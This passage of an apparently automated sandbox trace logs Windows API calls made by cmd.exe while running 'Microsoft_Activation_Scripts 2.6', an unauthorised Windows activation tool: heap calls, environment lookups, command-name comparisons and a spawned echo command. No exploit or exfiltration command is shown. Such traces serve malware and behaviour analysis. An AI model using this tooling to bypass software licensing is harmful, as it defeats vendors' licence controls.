(HeapHandle=0x130b3e10000, Flags=0x0, Size=0x28) returned 0x130b3e169c0 [0176.646] FindClose (in: hFindFile=0x130b3e16960 | out: hFindFile=0x130b3e16960) returned 1 [0176.646] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0176.646] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0176.646] GetConsoleTitleW (in: lpConsoleTitle=0x1271eff5f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.646] InitializeProcThreadAttributeList (in: lpAttributeList=0x1271eff510, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1271eff410 | out: lpAttributeList=0x1271eff510, lpSize=0x1271eff410) returned 1 [0176.646] UpdateProcThreadAttribute (in: lpAttributeList=0x1271eff510, dwFlags=0x0, Attribute=0x60001, lpValue=0x1271eff3fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1271eff510, lpPreviousValue=0x0) returned 1 [0176.647] GetStartupInfoW (in: lpStartupInfo=0x1271eff4a0 | out: lpStartupInfo=0x1271eff4a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20, hStdOutput=0x98, hStdError=0x28)) [0176.647] GetProcessHeap () returned 0x130b3e10000 [0176.647] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x20) returned 0x130b3e16b30 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.647] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0176.648] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0176.648] GetProcessHeap () returned 0x130b3e10000 [0176.649] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e16b30) returned 1 [0176.649] GetProcessHeap () returned 0x130b3e10000 [0176.649] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x12) returned 0x130b3e16960 [0176.649] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0176.652] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo prompt $E \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x1271eff430*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo prompt $E \"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1271eff418 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /S /D /c\" echo prompt $E \"", lpProcessInformation=0x1271eff418*(hProcess=0x9c, hThread=0x94, dwProcessId=0xcd4, dwThreadId=0x1348)) returned 1 [0176.663] CloseHandle (hObject=0x94) returned 1 [0176.663] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0176.663] GetProcessHeap () returned 0x130b3e10000 [0176.663] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e19aa0) returned 1 [0176.663] GetEnvironmentStringsW () returned 0x130b3e19aa0* [0176.663] GetProcessHeap () returned 0x130b3e10000 [0176.663] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xbee) returned 0x130b3e1ef00 [0176.664] memcpy (in: _Dst=0x130b3e1ef00, _Src=0x130b3e19aa0, _Size=0xbee | out: _Dst=0x130b3e1ef00) returned 0x130b3e1ef00 [0176.664] FreeEnvironmentStringsA (penv="=") returned 1 [0176.664] GetProcessHeap () returned 0x130b3e10000 [0176.664] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e16960) returned 1 [0176.664] DeleteProcThreadAttributeList (in: lpAttributeList=0x1271eff510 | out: lpAttributeList=0x1271eff510) [0176.664] _get_osfhandle (_FileHandle=3) returned 0x88 [0176.664] DuplicateHandle (in: hSourceProcessHandle=0x9c, hSourceHandle=0x88, hTargetProcessHandle=0x0, lpTargetHandle=0x0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x1 | out: lpTargetHandle=0x0) returned 1 [0176.664] _dup2 (_FileHandleSrc=5, _FileHandleDst=1) returned 0 [0176.664] _close (_FileHandle=5) returned 0 [0176.664] _dup (_FileHandle=0) returned 4 [0176.664] _dup2 (_FileHandleSrc=3, _FileHandleDst=0) returned 0 [0176.664] _close (_FileHandle=3) returned 0 [0176.664] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0176.664] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0176.664] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0176.664] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0176.664] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0176.665] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0176.665] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0176.665] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0176.665] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0176.665] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0176.665] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0176.665] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0176.665] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0176.665] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0176.665] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0176.665] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0176.665] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0176.665] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0176.665] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0176.665] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0176.665] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0176.665] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0176.665] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0176.665] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0176.665] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0176.665] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0176.665] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0176.665] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0176.665] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0176.665] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0176.665] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0176.665] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0176.665] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0176.665] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0176.666] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0176.666] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0176.666] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0176.666] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0176.666] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0176.666] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0176.666] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0176.666] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0176.666] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0176.666] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0176.666] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0176.666] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0176.666] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0176.666] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0176.666] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0176.666] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0176.666] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0176.666] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0176.666] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0176.666] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0176.666] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0176.666] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0176.666] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0176.666] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0176.666] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0176.666] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0176.666] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0176.666] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0176.666] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0176.666] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0176.667] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0176.667] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0176.667] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0176.667] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0176.667] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0176.667] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0176.667] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0176.667] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0176.667] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0176.667] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0176.667] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0176.667] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0176.667] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0176.667] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0176.667] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0176.667] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0176.667] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0176.667] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0176.667] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0176.667] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0176.667] _wcsicmp (_String1="cmd", _String2="FOR") returned -3 [0176.667] _wcsicmp (_String1="cmd", _String2="IF") returned -6 [0176.667] _wcsicmp (_String1="cmd", _String2="REM") returned -15 [0176.667] GetProcessHeap () returned 0x130b3e10000 [0176.667] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x4010) returned 0x130b3e1fb00 [0176.668] _wcsicmp (_String1="cmd", _String2="DIR") returned -1 [0176.668] _wcsicmp (_String1="cmd", _String2="ERASE") returned -2 [0176.668] _wcsicmp (_String1="cmd", _String2="DEL") returned -1 [0176.668] _wcsicmp (_String1="cmd", _String2="TYPE") returned -17 [0176.668] _wcsicmp (_String1="cmd", _String2="COPY") returned -2 [0176.668] _wcsicmp (_String1="cmd", _String2="CD") returned 9 [0176.668] _wcsicmp (_String1="cmd", _String2="CHDIR") returned 5 [0176.668] _wcsicmp (_String1="cmd", _String2="RENAME") returned -15 [0176.668] _wcsicmp (_String1="cmd", _String2="REN") returned -15 [0176.668] _wcsicmp (_String1="cmd", _String2="ECHO") returned -2 [0176.668] _wcsicmp (_String1="cmd", _String2="SET") returned -16 [0176.668] _wcsicmp (_String1="cmd", _String2="PAUSE") returned -13 [0176.668] _wcsicmp (_String1="cmd", _String2="DATE") returned -1 [0176.668] _wcsicmp (_String1="cmd", _String2="TIME") returned -17 [0176.668] _wcsicmp (_String1="cmd", _String2="PROMPT") returned -13 [0176.668] _wcsicmp (_String1="cmd", _String2="MD") returned -10 [0176.668] _wcsicmp (_String1="cmd", _String2="MKDIR") returned -10 [0176.668] _wcsicmp (_String1="cmd", _String2="RD") returned -15 [0176.668] _wcsicmp (_String1="cmd", _String2="RMDIR") returned -15 [0176.668] _wcsicmp (_String1="cmd", _String2="PATH") returned -13 [0176.668] _wcsicmp (_String1="cmd", _String2="GOTO") returned -4 [0176.668] _wcsicmp (_String1="cmd", _String2="SHIFT") returned -16 [0176.669] _wcsicmp (_String1="cmd", _String2="CLS") returned 1 [0176.669] _wcsicmp (_String1="cmd", _String2="CALL") returned 12 [0176.669] _wcsicmp (_String1="cmd", _String2="VERIFY") returned -19 [0176.669] _wcsicmp (_String1="cmd", _String2="VER") returned -19 [0176.669] _wcsicmp (_String1="cmd", _String2="VOL") returned -19 [0176.669] _wcsicmp (_String1="cmd", _String2="EXIT") returned -2 [0176.669] _wcsicmp (_String1="cmd", _String2="SETLOCAL") returned -16 [0176.669] _wcsicmp (_String1="cmd", _String2="ENDLOCAL") returned -2 [0176.669] _wcsicmp (_String1="cmd", _String2="TITLE") returned -17 [0176.669] _wcsicmp (_String1="cmd", _String2="START") returned -16 [0176.669] _wcsicmp (_String1="cmd", _String2="DPATH") returned -1 [0176.669] _wcsicmp (_String1="cmd", _String2="KEYS") returned -8 [0176.669] _wcsicmp (_String1="cmd", _String2="MOVE") returned -10 [0176.669] _wcsicmp (_String1="cmd", _String2="PUSHD") returned -13 [0176.669] _wcsicmp (_String1="cmd", _String2="POPD") returned -13 [0176.669] _wcsicmp (_String1="cmd", _String2="ASSOC") returned 2 [0176.669] _wcsicmp (_String1="cmd", _String2="FTYPE") returned -3 [0176.669] _wcsicmp (_String1="cmd", _String2="BREAK") returned 1 [0176.669] _wcsicmp (_String1="cmd", _String2="COLOR") returned -2 [0176.669] _wcsicmp (_String1="cmd", _String2="MKLINK") returned -10 [0176.669] _wcsnicmp (_String1="cmd", _String2="cmd ", _MaxCount=0x4) returned -32 [0176.669] GetProcessHeap () returned 0x130b3e10000 [0176.669] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x420) returned 0x130b3e19aa0 [0176.669] SetErrorMode (uMode=0x0) returned 0x0 [0176.670] SetErrorMode (uMode=0x1) returned 0x0 [0176.670] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x130b3e19ab0, lpFilePart=0x1271eff580 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x1271eff580*="System32") returned 0x13 [0176.670] SetErrorMode (uMode=0x0) returned 0x1 [0176.670] GetProcessHeap () returned 0x130b3e10000 [0176.670] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e19aa0, Size=0x40) returned 0x130b3e19aa0 [0176.670] GetProcessHeap () returned 0x130b3e10000 [0176.670] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e19aa0) returned 0x40 [0176.670] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.670] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.670] GetProcessHeap () returned 0x130b3e10000 [0176.670] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xee) returned 0x130b3e1ec60 [0176.670] GetProcessHeap () returned 0x130b3e10000 [0176.670] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x1cc) returned 0x130b3e19af0 [0176.673] GetProcessHeap () returned 0x130b3e10000 [0176.673] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e19af0, Size=0xf0) returned 0x130b3e19af0 [0176.673] GetProcessHeap () returned 0x130b3e10000 [0176.673] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e19af0) returned 0xf0 [0176.673] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.673] GetProcessHeap () returned 0x130b3e10000 [0176.673] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xfc) returned 0x130b3e1ed60 [0176.673] GetProcessHeap () returned 0x130b3e10000 [0176.673] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e1ed60, Size=0x88) returned 0x130b3e1ed60 [0176.673] GetProcessHeap () returned 0x130b3e10000 [0176.673] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e1ed60) returned 0x88 [0176.673] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.673] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.*" (normalized: "c:\\windows\\system32\\cmd.*"), fInfoLevelId=0x1, lpFindFileData=0x1271eff300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff300) returned 0x130b3e16960 [0176.674] GetProcessHeap () returned 0x130b3e10000 [0176.674] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e169c0, Size=0x8) returned 0x130b3e169c0 [0176.674] FindClose (in: hFindFile=0x130b3e16960 | out: hFindFile=0x130b3e16960) returned 1 [0176.674] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.COM" (normalized: "c:\\windows\\system32\\cmd.com"), fInfoLevelId=0x1, lpFindFileData=0x1271eff300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff300) returned 0xffffffffffffffff [0176.674] GetLastError () returned 0x2 [0176.674] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.EXE" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x1271eff300, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff300) returned 0x130b3e16960 [0176.674] FindClose (in: hFindFile=0x130b3e16960 | out: hFindFile=0x130b3e16960) returned 1 [0176.674] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.674] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.674] GetProcessHeap () returned 0x130b3e10000 [0176.674] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x28) returned 0x130b3e16c20 [0176.674] GetProcessHeap () returned 0x130b3e10000 [0176.674] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x218) returned 0x130b3e19bf0 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x18) returned 0x130b3e16e00 [0176.675] _wcsnicmp (_String1="cmd", _String2="cmd ", _MaxCount=0x4) returned -32 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x420) returned 0x130b3e19e10 [0176.675] SetErrorMode (uMode=0x0) returned 0x0 [0176.675] SetErrorMode (uMode=0x1) returned 0x0 [0176.675] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x130b3e19e20, lpFilePart=0x1271eff310 | out: lpBuffer="C:\\Windows\\System32", lpFilePart=0x1271eff310*="System32") returned 0x13 [0176.675] SetErrorMode (uMode=0x0) returned 0x1 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e19e10, Size=0x40) returned 0x130b3e19e10 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e19e10) returned 0x40 [0176.675] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x58 [0176.675] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xee) returned 0x130b3e19e60 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x1cc) returned 0x130b3e19f60 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e19f60, Size=0xf0) returned 0x130b3e19f60 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e19f60) returned 0xf0 [0176.675] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff7bd7296a0, nSize=0x2000 | out: lpBuffer="") returned 0x3a [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.675] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xfc) returned 0x130b3e1a060 [0176.675] GetProcessHeap () returned 0x130b3e10000 [0176.676] RtlReAllocateHeap (Heap=0x130b3e10000, Flags=0x0, Ptr=0x130b3e1a060, Size=0x88) returned 0x130b3e1a060 [0176.676] GetProcessHeap () returned 0x130b3e10000 [0176.676] RtlSizeHeap (HeapHandle=0x130b3e10000, Flags=0x0, MemoryPointer=0x130b3e1a060) returned 0x88 [0176.676] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.*" (normalized: "c:\\windows\\system32\\cmd.*"), fInfoLevelId=0x1, lpFindFileData=0x1271eff090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff090) returned 0x130b3e16960 [0176.676] FindClose (in: hFindFile=0x130b3e16960 | out: hFindFile=0x130b3e16960) returned 1 [0176.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.COM" (normalized: "c:\\windows\\system32\\cmd.com"), fInfoLevelId=0x1, lpFindFileData=0x1271eff090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff090) returned 0xffffffffffffffff [0176.676] GetLastError () returned 0x2 [0176.676] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\cmd.EXE" (normalized: "c:\\windows\\system32\\cmd.exe"), fInfoLevelId=0x1, lpFindFileData=0x1271eff090, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1271eff090) returned 0x130b3e16960 [0176.676] FindClose (in: hFindFile=0x130b3e16960 | out: hFindFile=0x130b3e16960) returned 1 [0176.676] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0176.676] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0176.676] GetConsoleTitleW (in: lpConsoleTitle=0x1271eff5f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.711] InitializeProcThreadAttributeList (in: lpAttributeList=0x1271eff510, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1271eff410 | out: lpAttributeList=0x1271eff510, lpSize=0x1271eff410) returned 1 [0176.711] UpdateProcThreadAttribute (in: lpAttributeList=0x1271eff510, dwFlags=0x0, Attribute=0x60001, lpValue=0x1271eff3fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1271eff510, lpPreviousValue=0x0) returned 1 [0176.711] GetStartupInfoW (in: lpStartupInfo=0x1271eff4a0 | out: lpStartupInfo=0x1271eff4a0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x20, hStdOutput=0x98, hStdError=0x28)) [0176.711] GetProcessHeap () returned 0x130b3e10000 [0176.711] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x20) returned 0x130b3e16bf0 [0176.712] _wcsnicmp (_String1="COPYCMD", 